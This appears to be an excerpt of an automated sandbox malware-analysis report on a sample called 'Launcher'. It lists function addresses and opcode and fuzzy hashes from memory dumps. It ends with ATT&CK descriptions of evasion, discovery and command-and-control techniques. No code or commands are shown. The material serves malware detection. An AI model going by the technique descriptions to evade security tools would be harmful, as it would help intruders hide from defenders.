Opcode ID: d922c8c76385895eff9e06dbde0d378b0975443f33eda9d7e9f93c007e447686
Instruction ID: 15d324a45f5c7020947b64f6c6889e7e9870f41717e70cf812dde9296cbb9e42
Opcode Fuzzy Hash: d922c8c76385895eff9e06dbde0d378b0975443f33eda9d7e9f93c007e447686
Instruction Fuzzy Hash: 31214D71504240EFEF16CF94D8C0B16BFA5FB88314F24C6A8E9480B286C336D816CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0100D5AC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b0431815fd5789b2c7087140bdd399e43e48fc4b07583e19b9f5ca74101dcdb
Instruction ID: 141fbcbb229959bcfeeca0369c23971ce3daacc36abc58e6f723565110e0c002
Opcode Fuzzy Hash: 2b0431815fd5789b2c7087140bdd399e43e48fc4b07583e19b9f5ca74101dcdb
Instruction Fuzzy Hash: 192148B1504204DFEB06CF94D9C0F26BFA1FB88324F2085A9ED490B286C736D846CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0100D2E4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deba95d1233d2390e29b2e79cd25b040aab79fb28d5a80083bbb830dc69c98c2
Instruction ID: ee78bf847d3d94277bf03cd7134ea075eafc0c9316604b8703ab95710ee4c4a7
Opcode Fuzzy Hash: deba95d1233d2390e29b2e79cd25b040aab79fb28d5a80083bbb830dc69c98c2
Instruction Fuzzy Hash: 042128B1504244EFEB16CF94D9C0B1ABFA5FB84324F24C5A9E9454B286C336D856C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0101D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50d00aa6803d9d3da01dda245aca0e3e22e67c1fbc352e95ec471ecd43755d9
Instruction ID: abb7816f353f392ae29055c6b4c1adae9965ae15667f5ab6b33e3657b5b355d5
Opcode Fuzzy Hash: c50d00aa6803d9d3da01dda245aca0e3e22e67c1fbc352e95ec471ecd43755d9
Instruction Fuzzy Hash: 112137B5504204EFDB16CF54D9C8B16BBA1FB84354F20C9ADE9894B24AC33ED847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010F33C5 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad284a01888a9e0afdd011e6ea6a355adb9232b596ae251f8d25b959b67cdc2
Instruction ID: 1f1d2aca4515f2197185417171ae5e258ba3ffa6460e629fe64e69d17f1ff742
Opcode Fuzzy Hash: 3ad284a01888a9e0afdd011e6ea6a355adb9232b596ae251f8d25b959b67cdc2
Instruction Fuzzy Hash: 143100B4D00208CFDB24CFA9C985BDDBBF1BF88324F148469D504AB650DBB4A885CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010F33D0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8d16c3d2ac7076d6417f300452e932667aa9514a926e1767d5fb9e9ab58725
Instruction ID: 3d7defffbcaa9f1d338fdab2bbe2bddb331706f27026c49420183ce77a14de3c
Opcode Fuzzy Hash: 2b8d16c3d2ac7076d6417f300452e932667aa9514a926e1767d5fb9e9ab58725
Instruction Fuzzy Hash: 7731C0B4D01208DFDB24CF9AC885BDEBBF5BF88314F148469D504AB650DBB4A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010F05E1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49aeeca75d1cdbf3c378f084343a338db9c151ed154fc6e979871b41fb9e4cca
Instruction ID: 41587eea170a853660a887f9bb09a7719b30d59a6199535a548cafc6369280a9
Opcode Fuzzy Hash: 49aeeca75d1cdbf3c378f084343a338db9c151ed154fc6e979871b41fb9e4cca
Instruction Fuzzy Hash: 0711D330B4011C5FDB15ABB4A8647BE3BA6EF88704F1080A9D546D7384EF3A9D168B91

Uniqueness

Uniqueness Score: -1.00%

Function 0101EAEB Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8992b3440fecfa8be018f469ee86027954e2efffd77a21f57a972bbeb4b71e3
Instruction ID: abade390168d8a09d16715b4dbb36164a1d5a0adfce3fd6896e6d6c917624386
Opcode Fuzzy Hash: d8992b3440fecfa8be018f469ee86027954e2efffd77a21f57a972bbeb4b71e3
Instruction Fuzzy Hash: 97218076404240DFCF438F54D9C4B56BFB2FB48324F2482D9ED450A66AC33AD866DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101E01B Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f3c37e40fdf7a5f687bfdc4dd195c53bfa191122d2a9f0d2f90915aa82151b
Instruction ID: 611dcbfd9e69227b8fb3e97b7eab4ace112801b787e2f0f9a0e142c44d001536
Opcode Fuzzy Hash: 56f3c37e40fdf7a5f687bfdc4dd195c53bfa191122d2a9f0d2f90915aa82151b
Instruction Fuzzy Hash: AF218976400240EFCF56CF54C9C0B55BFB2FB48314F2486A8EE494A22AC33AD8A6DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0101E9EF Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f355adb41706aa6a52bb1fa50dc5459139809cfbd5d6f5a2249d44f348c61e8
Instruction ID: 021ae744ed9208af5bafe224c7573c91dd6c208b0ea917eede89fb5c3f7fd739
Opcode Fuzzy Hash: 4f355adb41706aa6a52bb1fa50dc5459139809cfbd5d6f5a2249d44f348c61e8
Instruction Fuzzy Hash: 42219276404240DFCF12CF54D9C4B56BFB2FB88314F2882A9DD480A65AC33AD456CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010F1B99 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7197c78a1ae74feb9265126a482532be8580a25e6e92a2daacd63b4309066be7
Instruction ID: 6d3830ae49da5b7230c9d812fe9eaa19598db68148a144ece54368794228e2f7
Opcode Fuzzy Hash: 7197c78a1ae74feb9265126a482532be8580a25e6e92a2daacd63b4309066be7
Instruction Fuzzy Hash: D911E03A7042199BC741ABB8D8916AD37E6DB84155309C1EACA42E7744EF388C0397C0

Uniqueness

Uniqueness Score: -1.00%

Function 010F05F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 135a969887b4abf3c740826979e74ff9dbb1c49ff5ae56b6704a99911d157a7f
Instruction ID: 03572269ce45070c88f742c542476a601acac8e5d79e48a65c2445b4253be75b
Opcode Fuzzy Hash: 135a969887b4abf3c740826979e74ff9dbb1c49ff5ae56b6704a99911d157a7f
Instruction Fuzzy Hash: FA11A73475011C5FDB14E774E8247BE77AAEB88604F108079D506D3784EF399D054B91

Uniqueness

Uniqueness Score: -1.00%

Function 010F1A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a0a987b05880cfbcf924c9d238fcc67adc654015e62f05a6bc7cf3fb23fa1e
Instruction ID: 69ef1c68329eeafa84a13be351f4441ecd1639dcad7a69739ff7c84be31dfd15
Opcode Fuzzy Hash: a3a0a987b05880cfbcf924c9d238fcc67adc654015e62f05a6bc7cf3fb23fa1e
Instruction Fuzzy Hash: E511F730728142C7CF0477B1A55F0DD7EA96FE11423544D2CB246CBAA1DE3D9C42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0100D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac09f7af320d414f97dc20b1cb3316ef839b418cde5a5d63b5b44d0ce15d38d6
Instruction ID: 495ce4dec6adf0d1c8c07e77c6fc50fb548a2434937d05342ca3eb4c7ed1ddf6
Opcode Fuzzy Hash: ac09f7af320d414f97dc20b1cb3316ef839b418cde5a5d63b5b44d0ce15d38d6
Instruction Fuzzy Hash: 5221AF76404280DFDF16CF94D9C4B56BFB2FB88314F2886A9D9480B657C33AD466CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100D5A7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction ID: 7b5c28557828993801035957d54ede88a950db43062728e00ef4f4253779e595
Opcode Fuzzy Hash: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction Fuzzy Hash: C011B176404284CFDF12CF54D9C4B16BFB2FB88324F2486A9D8480B657C336D456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100D2DF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction ID: 0bc4c91363f77c9381652fade38e8cc1721bacd6d493b4ee7e5e8e51b3e52939
Opcode Fuzzy Hash: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction Fuzzy Hash: FA11D376504280CFDB16CF54D5C4B1ABFB1FB84324F24C6A9D8444B657C336D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 010F1BA8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5413d327d869838d3e6fdc0424bfe9cb7cd72af1eababadcda3d95a9aae70432
Instruction ID: 6a33d673910ba38f343ff7149e1e0f0644f1cb48970eb1ff8d783aa74bcec75a
Opcode Fuzzy Hash: 5413d327d869838d3e6fdc0424bfe9cb7cd72af1eababadcda3d95a9aae70432
Instruction Fuzzy Hash: F501F53A7041299B8B54E778D855BAE33EADBC4195305C1BADA01E7748FF388C039BC0

Uniqueness

Uniqueness Score: -1.00%

Function 0101D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504336783.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbf2c8cf6e9aa963d3f8e87034f12a02946631990a170d17c82b680eb3c0f293
Instruction ID: c8f46e562bdb0d8a5e845ceb0eaa65a8b282eb5267cc28a2e1a50387030bf80e
Opcode Fuzzy Hash: bbf2c8cf6e9aa963d3f8e87034f12a02946631990a170d17c82b680eb3c0f293
Instruction Fuzzy Hash: 84118E75504280DFDB12CF54D5C8B15BBA1FB44314F24C6AAE8494B65AC33AD44BCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 010F03F0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6c6219b5bf6ffc9cd205e8590b513233d5ab3f07b97a70999004f3b535d36a
Instruction ID: def710a9f2c4c4b61d26d5fdb1d7d15c08cdc60a2473059ba9e445440c72441d
Opcode Fuzzy Hash: ba6c6219b5bf6ffc9cd205e8590b513233d5ab3f07b97a70999004f3b535d36a
Instruction Fuzzy Hash: 9301F72268E3A51BD706E738A4709DE3FA56F5311CB1588FBC082CE582DE4DC9478399

Uniqueness

Uniqueness Score: -1.00%

Function 010F1C58 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b98903ec92bf8fc43f140e262b4b17c2f67bb720936af63275a324b19e0c47
Instruction ID: 2c990897dea29a1766e5ff3b1d05825425181025f8dc2df8d8f00700d16092c1
Opcode Fuzzy Hash: e1b98903ec92bf8fc43f140e262b4b17c2f67bb720936af63275a324b19e0c47
Instruction Fuzzy Hash: 660128327041544FE70A97A8A8A27FE37D6DB85214F4444BAC549DF780EF348C0743E5

Uniqueness

Uniqueness Score: -1.00%

Function 0100DA3D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4ac3dbfdc14c126fee05cf2b0710578a93700853f2666a0eeeaaa5281c09b1
Instruction ID: 2d288b00252fc224ca54aa5f095e3fbaac8a68533bc5ca89e0f2d4fe94629a07
Opcode Fuzzy Hash: fe4ac3dbfdc14c126fee05cf2b0710578a93700853f2666a0eeeaaa5281c09b1
Instruction Fuzzy Hash: 6101FC7100C3449AF7128B99D8C4766FBD8DF42224F08C19AED845A2C6D3749880CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0100D8BB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cc956e7500b5e57c4a68ad5fc69b39f52ee72a047446db938263fe023defeb
Instruction ID: 3c23ebb18cb5f8fb3c8327007b29f79356ec8aeda5e38d1e2fa10d00f26c85cb
Opcode Fuzzy Hash: d5cc956e7500b5e57c4a68ad5fc69b39f52ee72a047446db938263fe023defeb
Instruction Fuzzy Hash: F6010876100A00AFD7619F4AC940C27FBBAFB88720745845EE98A4BA21C272F851DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100D8AC Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f0835f8c641500ff32806e8c1ffd9bb5722d2518caee0146419d7afd110c95
Instruction ID: bbfa18c0e92e54b39fd5e7d517bdc6cb005496c6857c610c878221edc30afdee
Opcode Fuzzy Hash: a5f0835f8c641500ff32806e8c1ffd9bb5722d2518caee0146419d7afd110c95
Instruction Fuzzy Hash: 17010C36104740AFD7628F55C940C22BFBAFF89620719888DE9864BA62C231F812DF60

Uniqueness

Uniqueness Score: -1.00%

Function 010F047F Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774042c7f75a2c0bfef467189cd547368025df2677490286903850b775e2c880
Instruction ID: ad53b86e0e3070431d32662fdb6311527397b67c95084583bdf58ecc0f462910
Opcode Fuzzy Hash: 774042c7f75a2c0bfef467189cd547368025df2677490286903850b775e2c880
Instruction Fuzzy Hash: 29F0C831F403001BE2569B7450557BE23D7D7C1164F04816ED9854B395CFA96C0B4751

Uniqueness

Uniqueness Score: -1.00%

Function 0100DA3C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504298684.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100d000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2658c5b55bf807fe313e694e976852dd464300ceaad550099d046b04951d38
Instruction ID: 2daeced6c293515ba101066eb83e869fb2a5c17ecc370524807e62ba0f860025
Opcode Fuzzy Hash: ff2658c5b55bf807fe313e694e976852dd464300ceaad550099d046b04951d38
Instruction Fuzzy Hash: B8F068714083449AE7518A59DCC4B62FFD8EB82634F18C55AED445B286D3789844CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 010F06C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f084313c80bb206b6f66f3b59a64e6c1756bd0fbaf43ad273baa8a2c5aafd231
Instruction ID: 82d42856314b5d060137bc616fdee59d2b28133de3c7b15b97c20c426bcb8470
Opcode Fuzzy Hash: f084313c80bb206b6f66f3b59a64e6c1756bd0fbaf43ad273baa8a2c5aafd231
Instruction Fuzzy Hash: A1F0A7317043801FE3029379A4152FD7B9AC7C3154F0941AFDA848B186CA651C078B91

Uniqueness

Uniqueness Score: -1.00%

Function 010F0448 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9967cc004245ab940502f94a911cda319aef5a610eb8362d6fb4b7c0f3e6ca59
Instruction ID: 4b2df507e7b961ae5c10d62e3d7e5050184ea86e8e7fcbab92ca64eadb46fbe2
Opcode Fuzzy Hash: 9967cc004245ab940502f94a911cda319aef5a610eb8362d6fb4b7c0f3e6ca59
Instruction Fuzzy Hash: 4AD0A725B0422C23D609BA74503427F214F9BC1458B40902DD1478B384CE5E8D0103E9

Uniqueness

Uniqueness Score: -1.00%

Function 010F34F8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f9b47dafb9f1eed52f4dcc6324526b541cca427fa0292edd2ac98e4fcdd7ee
Instruction ID: 251a62898c24375d55e259961801f3fb335f79620ce08396b3908a1eedb7b20e
Opcode Fuzzy Hash: e8f9b47dafb9f1eed52f4dcc6324526b541cca427fa0292edd2ac98e4fcdd7ee
Instruction Fuzzy Hash: 61D02BB2B052819FCF13831894D704B37D16B9141070640E74641CF683F934C886C312

Uniqueness

Uniqueness Score: -1.00%

Function 010F1B67 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6655b02992477febe5d385bba23cd2ae39a1d7ff8f2095bf472e423bc342bb55
Instruction ID: 98d750f881106b82f8d413f04b1e07098745f0a34b1fb4747c5c561d573ca0bd
Opcode Fuzzy Hash: 6655b02992477febe5d385bba23cd2ae39a1d7ff8f2095bf472e423bc342bb55
Instruction Fuzzy Hash: 28D0A7256091428BCB0153F094AA5D637E1CB7621030448978186DFB61FD38C5174780

Uniqueness

Uniqueness Score: -1.00%

Function 010F3391 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4810b124fc18c27c22760fa15ed84ea353f2b2c7fa933b4e38af2e3edcf5f758
Instruction ID: 55d539c631791dfc3fd27b603cf15f72701bd2fe20d9e226a883fbe468f4f0d7
Opcode Fuzzy Hash: 4810b124fc18c27c22760fa15ed84ea353f2b2c7fa933b4e38af2e3edcf5f758
Instruction Fuzzy Hash: 95D05E35A09244DBCF41EBB0EA661ED7BB0AF96201B1005EA9946D7280EA349E10A640

Uniqueness

Uniqueness Score: -1.00%

Function 010F10EF Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdadaec79eed8d662a6f98a31a5010e048ee9fe900319fe34ce9a715e46da6c1
Instruction ID: 701cce34a937eddf69cd079f1bfc4107c0e54e0709e44f874b8b311e515e2273
Opcode Fuzzy Hash: fdadaec79eed8d662a6f98a31a5010e048ee9fe900319fe34ce9a715e46da6c1
Instruction Fuzzy Hash: AFD05E3830D7C28FC7172B29986366E3FF96F8B200F4804EE82C0874A3D4394406C712

Uniqueness

Uniqueness Score: -1.00%

Function 010F1100 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.504439166.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10f0000_Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d149efb97878a8dcf450e28d109532560376df1e4d7a2a6b9d6c57180f53724
Instruction ID: f5b3736715c2bba5f25c74a70f0697382c28cec030bc479f0196f0661a884063
Opcode Fuzzy Hash: 8d149efb97878a8dcf450e28d109532560376df1e4d7a2a6b9d6c57180f53724
Instruction Fuzzy Hash: 55C01238704503DBDB980759EC1772D64ED7F85601B9080AC5345C6654DD3488014222

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
